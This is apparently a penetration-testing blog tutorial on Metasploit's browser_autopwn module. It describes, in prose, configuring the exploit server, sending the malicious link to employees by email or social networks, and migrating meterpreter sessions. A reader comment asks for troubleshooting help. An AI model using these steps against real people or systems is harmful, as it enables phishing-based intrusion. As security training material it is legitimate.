In nowadays due to firewall restrictions and patch management policies exploitation of systems has become much more difficult.However one of the most efficient way is the use of client-side attacks.Client side attacks requires the user interaction and in most of the cases can be used through social engineering engagements.An employee which will not have the necessary knowledge to understand the risks of opening untrusted links can help an attacker to exploit any internal systems.Also the fact that browsers are not patched as often as operating systems makes the problem bigger.

In this article we will examine the effectiveness of metasploit browser autopwn module.The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits.When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.

In order to use this attack we have to open the metasploit framework and to use the browser_autopwn module.In the next image you can see the available options and default settings for this module.

Options of browser autopwn module

We will set up the LHOST with our IP address,the SRVPORT with the port 80 (otherwise the link that we have to send to the user must me in the format IP:8080) and the URIPATH with / in order to prevent metasploit to set up random URL’s.

Configuring the Browser Autopwn

 

After the execution of this module we will notice that different exploits for a variety of browsers will start loading to our web server.

Loading the browser exploits

 

Now we can share the link through our email to our client employees.If any user opens the malicious link,the autopwn module will try all these exploits in order to see if it can break into the client.If the browser is vulnerable to any of these exploits meterpreter sessions will open.

Meterpreter sessions opened with Browser Autopwn

 

Browser based attacks are not stable.This is because browsers can crash which means that the meterpreter session or the shell access will lost.For that reason the metasploit will try to migrate with a another process more stable as soon as possible.

Migrate to another process

 

Conclusion

Most of the organizations are behind proxy firewalls so only the port 80 is allowed.From the other hand many employees are using social networks these days for various reasons.An attacker can exploit that and send malicious links through the social networks to users so the use of this attack can be very effective against companies as it contains exploits for most of the popular browsers and it only requires the mistake of one person in order to be successful.Metasploit Browser Autopwn module is the proof of how dangerous is to open links that are coming from untrusted sources.

4 Comments

  1. Pingback: Wifi-leaks Deel 1
  2. I tried using the exploit, but when i open the URL in victim PC (VM instance of Win XP SP1 ), in my msfconsole i get the message handling request from 192.168.1.3 (ip of xp) and nothing happens
    please help

Leave a Reply to kishore rajendra Cancel reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s